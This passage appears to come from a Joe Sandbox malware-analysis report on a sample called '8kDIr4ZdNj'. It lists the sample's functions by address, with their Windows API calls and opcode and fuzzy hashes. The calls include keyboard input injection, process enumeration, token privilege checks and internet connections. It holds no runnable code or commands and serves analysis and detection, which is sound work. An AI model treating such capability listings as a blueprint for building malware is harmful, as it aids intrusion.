                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: _strlen
                                                                        • String ID:
                                                                        • API String ID: 4218353326-0
                                                                        • Opcode ID: 71fb0abe431351a15c7128b345e550d61bb65abaa547746fe7e8f3504b938132
                                                                        • Instruction ID: d1013bfb162d317984cadbfdb3064350761a7d35ffa57119ec7e7535a0253ab3
                                                                        • Opcode Fuzzy Hash: 71fb0abe431351a15c7128b345e550d61bb65abaa547746fe7e8f3504b938132
                                                                        • Instruction Fuzzy Hash: 52415E31A00114AFCB14EBA8DC96EAEB7A9FF45310F148159F91ADB2D2DB34AD10CB51
                                                                        Function 008FB7F4 Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 008FB89E
                                                                        • GetLastError.KERNEL32(?,00000000), ref: 008FB8C4
                                                                        • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 008FB8E9
                                                                        • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 008FB915
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: CreateHardLink$DeleteErrorFileLast
                                                                        • String ID:
                                                                        • API String ID: 3321077145-0
                                                                        • Opcode ID: da0d26331b47dca23556e1349ffe57ffb9bb9fe6a798df4b7e7ef53d61f82f00
                                                                        • Instruction ID: 283a9daa1ec95df3846f3b7917ccd8734735a8f278f822d5185714d956dec0b2
                                                                        • Opcode Fuzzy Hash: da0d26331b47dca23556e1349ffe57ffb9bb9fe6a798df4b7e7ef53d61f82f00
                                                                        • Instruction Fuzzy Hash: 3141F739600514DFCF11EF29C485A69BBA5FF49310B198098ED8AAB362DB34ED01DB92
                                                                        Function 00918851 Relevance: 6.1, APIs: 4, Instructions: 109COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 009188DE
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: InvalidateRect
                                                                        • String ID:
                                                                        • API String ID: 634782764-0
                                                                        • Opcode ID: 7002503c366c2a0e1c531a98fe14c6830d94fefd49443fbad740dd356402f27e
                                                                        • Instruction ID: 07cd5a715f5375e8d1a282ebddff612385c25a572a34ed831aa32a74a5b4f6fe
                                                                        • Opcode Fuzzy Hash: 7002503c366c2a0e1c531a98fe14c6830d94fefd49443fbad740dd356402f27e
                                                                        • Instruction Fuzzy Hash: 1831D43471410CAFEF249A58CC45BFA77A9EB06350F944512FA21E61A1CE34E9C0F752
                                                                        Function 0091AB37 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • ClientToScreen.USER32(?,?), ref: 0091AB60
                                                                        • GetWindowRect.USER32(?,?), ref: 0091ABD6
                                                                        • PtInRect.USER32(?,?,?), ref: 0091ABE6
                                                                        • MessageBeep.USER32(00000000), ref: 0091AC57
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Rect$BeepClientMessageScreenWindow
                                                                        • String ID:
                                                                        • API String ID: 1352109105-0
                                                                        • Opcode ID: 387bef1473cfea0b8d833fca64cf2f3ad4d8b061b871d6c9a950f56eea97c1ea
                                                                        • Instruction ID: 8f753fda1f4d84715c57fdca91ea7ed54c0a9061656232e2dd6e7954016ffd63
                                                                        • Opcode Fuzzy Hash: 387bef1473cfea0b8d833fca64cf2f3ad4d8b061b871d6c9a950f56eea97c1ea
                                                                        • Instruction Fuzzy Hash: 1B418B30B0520DDFCB11CF58C894BA97BF6FB49310F1980A9E998DB261D730AC81DB92
                                                                        Function 008F0AD6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 008F0B27
                                                                        • SetKeyboardState.USER32(00000080,?,00000001), ref: 008F0B43
                                                                        • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 008F0BA9
                                                                        • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 008F0BFB
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: KeyboardState$InputMessagePostSend
                                                                        • String ID:
                                                                        • API String ID: 432972143-0
                                                                        • Opcode ID: 2b22ec05539f195bdb5440456c17287f6bc936ddfe4f362686dfbb4546321055
                                                                        • Instruction ID: c57ad54bd4bbbe1e281d95a6172e70b8bbcc7c7588222739f353e97b1fab1c01
                                                                        • Opcode Fuzzy Hash: 2b22ec05539f195bdb5440456c17287f6bc936ddfe4f362686dfbb4546321055
                                                                        • Instruction Fuzzy Hash: CD310770A4421CAEFB308B798C05BFABBA6FB45338F14825AF691D21D3C77589409B52
                                                                        Function 008F0C11 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetKeyboardState.USER32(?,7694C0D0,?,00008000), ref: 008F0C66
                                                                        • SetKeyboardState.USER32(00000080,?,00008000), ref: 008F0C82
                                                                        • PostMessageW.USER32(00000000,00000101,00000000), ref: 008F0CE1
                                                                        • SendInput.USER32(00000001,?,0000001C,7694C0D0,?,00008000), ref: 008F0D33
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: KeyboardState$InputMessagePostSend
                                                                        • String ID:
                                                                        • API String ID: 432972143-0
                                                                        • Opcode ID: b040e363313a0006c3dc5ff61faf3e8b3f79fbdda1e06d8ae7c509664e22d40b
                                                                        • Instruction ID: 1f4e4a3500866b9b4b4c663cc14d7a1091ecdd4d9862fde06fc1a19891ff904f
                                                                        • Opcode Fuzzy Hash: b040e363313a0006c3dc5ff61faf3e8b3f79fbdda1e06d8ae7c509664e22d40b
                                                                        • Instruction Fuzzy Hash: F8314630A0421CAEFF308A798C147FEBBA6FB45324F14835AE694D21D3C3359945DB52
                                                                        Function 008C61C5 Relevance: 6.1, APIs: 4, Instructions: 97COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 008C61FB
                                                                        • __isleadbyte_l.LIBCMT ref: 008C6229
                                                                        • MultiByteToWideChar.KERNEL32(?,00000009,?,00000001,?,00000000), ref: 008C6257
                                                                        • MultiByteToWideChar.KERNEL32(?,00000009,?,00000001,?,00000000), ref: 008C628D
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                        • String ID:
                                                                        • API String ID: 3058430110-0
                                                                        • Opcode ID: b3d67443e33f4b1f3cbb64432b39e614007bd3a660733f176592be87cc257251
                                                                        • Instruction ID: 6640111bd8a62ef4241ac20e60154a93c6a185c6b7b591ee371d42265c75e6e9
                                                                        • Opcode Fuzzy Hash: b3d67443e33f4b1f3cbb64432b39e614007bd3a660733f176592be87cc257251
                                                                        • Instruction Fuzzy Hash: 1F318E3160424AAFDB218F65CC48FAA7BB9FF41321F15413DE864D71A1E731D960DB91
                                                                        Function 008F3C55 Relevance: 6.1, APIs: 4, Instructions: 85processCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 008F3C7A
                                                                        • Process32FirstW.KERNEL32(00000000,?), ref: 008F3C88
                                                                        • Process32NextW.KERNEL32(00000000,?), ref: 008F3CA8
                                                                        • CloseHandle.KERNEL32(00000000), ref: 008F3D52
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                        • String ID:
                                                                        • API String ID: 420147892-0
                                                                        • Opcode ID: 4dbf9443aa4fdecc582e7932f96f599c4d89ac0916d4f92a1f9d85c1df567d2b
                                                                        • Instruction ID: 957e6be3038cba470def4069a7d03c8d0df611fdccafe87615e47abbf7ce2517
                                                                        • Opcode Fuzzy Hash: 4dbf9443aa4fdecc582e7932f96f599c4d89ac0916d4f92a1f9d85c1df567d2b
                                                                        • Instruction Fuzzy Hash: 50317E311083099BD701FF64D891ABABBE8FF95354F54082DF582C61A1EB719A49CB53
                                                                        Function 0091C498 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00892612: GetWindowLongW.USER32(?,000000EB), ref: 00892623
                                                                        • GetCursorPos.USER32(?), ref: 0091C4D2
                                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,?,?,?,?,?,008CB9AB), ref: 0091C4E7
                                                                        • GetCursorPos.USER32(?), ref: 0091C534
                                                                        • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,008CB9AB), ref: 0091C56E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                        • String ID:
                                                                        • API String ID: 2864067406-0
                                                                        • Opcode ID: 7db3be999f8fc28845c43351d912d29f1d0d316c11413b70905a9bd21d18ebd6
                                                                        • Instruction ID: 908356a99b04ddff8a77e025b68a75aac214ec147bd31366f5517db62eca29e3
                                                                        • Opcode Fuzzy Hash: 7db3be999f8fc28845c43351d912d29f1d0d316c11413b70905a9bd21d18ebd6
                                                                        • Instruction Fuzzy Hash: FD31CE7570401CAFCB25CF59D868EFA7BBAEB09310F044069F9058B261C731AD90EBA4
                                                                        Function 008E8656 Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 008E810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 008E8121
                                                                          • Part of subcall function 008E810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 008E812B
                                                                          • Part of subcall function 008E810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 008E813A
                                                                          • Part of subcall function 008E810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 008E8141
                                                                          • Part of subcall function 008E810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 008E8157
                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 008E86A3
                                                                        • _memcmp.LIBCMT ref: 008E86C6
                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 008E86FC
                                                                        • HeapFree.KERNEL32(00000000), ref: 008E8703
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                        • String ID:
                                                                        • API String ID: 1592001646-0
                                                                        • Opcode ID: 960bfbf99bf9159f14e19dee4956f2c0c300847ab9a765725db82e61722f3722
                                                                        • Instruction ID: eb35a759f3318a6ca9536184304aa87c00c2a26d6387ae13c65b3f453fd63d62
                                                                        • Opcode Fuzzy Hash: 960bfbf99bf9159f14e19dee4956f2c0c300847ab9a765725db82e61722f3722
                                                                        • Instruction Fuzzy Hash: C6215771E44148EFDB10DFA9C949BEEB7B8FF56308F158059E848AB251DB30AE05DB90
                                                                        Function 008B098C Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __setmode.LIBCMT ref: 008B09AE
                                                                          • Part of subcall function 00895A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,008F7896,?,?,00000000), ref: 00895A2C
                                                                          • Part of subcall function 00895A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,008F7896,?,?,00000000,?,?), ref: 00895A50
                                                                        • _fprintf.LIBCMT ref: 008B09E5
                                                                        • OutputDebugStringW.KERNEL32(?), ref: 008E5DBB
                                                                          • Part of subcall function 008B4AAA: _flsall.LIBCMT ref: 008B4AC3
                                                                        • __setmode.LIBCMT ref: 008B0A1A
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                                        • String ID:
                                                                        • API String ID: 521402451-0
                                                                        • Opcode ID: 25cce476e8eb749c5677a9a424b79db5a74658f925829555adf592b601a58c8e
                                                                        • Instruction ID: 1e455d7f9c062e788afe124911076f924eb1d798d0ad13e2c55546d047127d1f
                                                                        • Opcode Fuzzy Hash: 25cce476e8eb749c5677a9a424b79db5a74658f925829555adf592b601a58c8e
                                                                        • Instruction Fuzzy Hash: 7B1127316046186FDB04B2BC9C479FE77A8FF56320F240169F115E6283EE60584297A6
                                                                        Function 00901767 Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 009017A3
                                                                          • Part of subcall function 0090182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0090184C
                                                                          • Part of subcall function 0090182D: InternetCloseHandle.WININET(00000000), ref: 009018E9
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Internet$CloseConnectHandleOpen
                                                                        • String ID:
                                                                        • API String ID: 1463438336-0
                                                                        • Opcode ID: 2da708714a1a6dad39cd485c22c9b991a565224b3e3e6e287e15cf7c572997d3
                                                                        • Instruction ID: 933be0a92bdb4204a387fbfd0e96bbc8e898861ec452194cb8bc7b82a0d7439a
                                                                        • Opcode Fuzzy Hash: 2da708714a1a6dad39cd485c22c9b991a565224b3e3e6e287e15cf7c572997d3
                                                                        • Instruction Fuzzy Hash: 9F21A432204605BFEB169F60DC01FBABBADFF88710F14842AF915965D0D7719911A7A0
                                                                        Function 008F3A2A Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetFileAttributesW.KERNEL32(?,0091FAC0), ref: 008F3A64
                                                                        • GetLastError.KERNEL32 ref: 008F3A73
                                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 008F3A82
                                                                        • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0091FAC0), ref: 008F3ADF
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: CreateDirectory$AttributesErrorFileLast
                                                                        • String ID:
                                                                        • API String ID: 2267087916-0
                                                                        • Opcode ID: ff7946b5a4bb0482e51ffd0e1a48b33ed41d93a2d553c5c49449bafef235e6cf
                                                                        • Instruction ID: 26dfb12f51dc0ed8bd5d934e29705e8d909f16444314d40026729c10807eda78
                                                                        • Opcode Fuzzy Hash: ff7946b5a4bb0482e51ffd0e1a48b33ed41d93a2d553c5c49449bafef235e6cf
                                                                        • Instruction Fuzzy Hash: 3C21B4741086199F8700EF39C8918BA77E8FE55368F144A19F4A9C72A1D731DA45CB42
                                                                        Function 008EDCBE Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 008EF0BC: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,008EDCD3,?,?,?,008EEAC6,00000000,000000EF,00000119,?,?), ref: 008EF0CB
                                                                          • Part of subcall function 008EF0BC: lstrcpyW.KERNEL32(00000000,?,?,008EDCD3,?,?,?,008EEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 008EF0F1
                                                                          • Part of subcall function 008EF0BC: lstrcmpiW.KERNEL32(00000000,?,008EDCD3,?,?,?,008EEAC6,00000000,000000EF,00000119,?,?), ref: 008EF122
                                                                        • lstrlenW.KERNEL32(?,00000002,?,?,?,?,008EEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 008EDCEC
                                                                        • lstrcpyW.KERNEL32(00000000,?,?,008EEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 008EDD12
                                                                        • lstrcmpiW.KERNEL32(00000002,cdecl,?,008EEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 008EDD46
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: lstrcmpilstrcpylstrlen
                                                                        • String ID: cdecl
                                                                        • API String ID: 4031866154-3896280584
                                                                        • Opcode ID: d9ee68277c77f5719367cb39328c7ce5b0fe375e9dc9388d7d2305f5cad1f683
                                                                        • Instruction ID: 0b3f76b35f21aa74f8027a612da9a2f21feba85db45dcfd89a53ae42969d9bf6
                                                                        • Opcode Fuzzy Hash: d9ee68277c77f5719367cb39328c7ce5b0fe375e9dc9388d7d2305f5cad1f683
                                                                        • Instruction Fuzzy Hash: FA11D03A300349EFCB259F75CC45DBA77A8FF46350B40812AF916CB2A0EB719855DB91
                                                                        Function 008C50E2 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _free.LIBCMT ref: 008C5101
                                                                          • Part of subcall function 008B571C: __FF_MSGBANNER.LIBCMT ref: 008B5733
                                                                          • Part of subcall function 008B571C: __NMSG_WRITE.LIBCMT ref: 008B573A
                                                                          • Part of subcall function 008B571C: RtlAllocateHeap.NTDLL(014B0000,00000000,00000001,00000000,?,?,?,008B0DD3,?), ref: 008B575F
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: AllocateHeap_free
                                                                        • String ID:
                                                                        • API String ID: 614378929-0
                                                                        • Opcode ID: 659e3e00358624906a9ca4f921e65a79ffcd0c9a4ad0a2b744eafb09a012614a
                                                                        • Instruction ID: 8ce2bcdac97a9f8a5bc9d9c0059fa7726922f02f870bd43cecd91743f824b4bf
                                                                        • Opcode Fuzzy Hash: 659e3e00358624906a9ca4f921e65a79ffcd0c9a4ad0a2b744eafb09a012614a
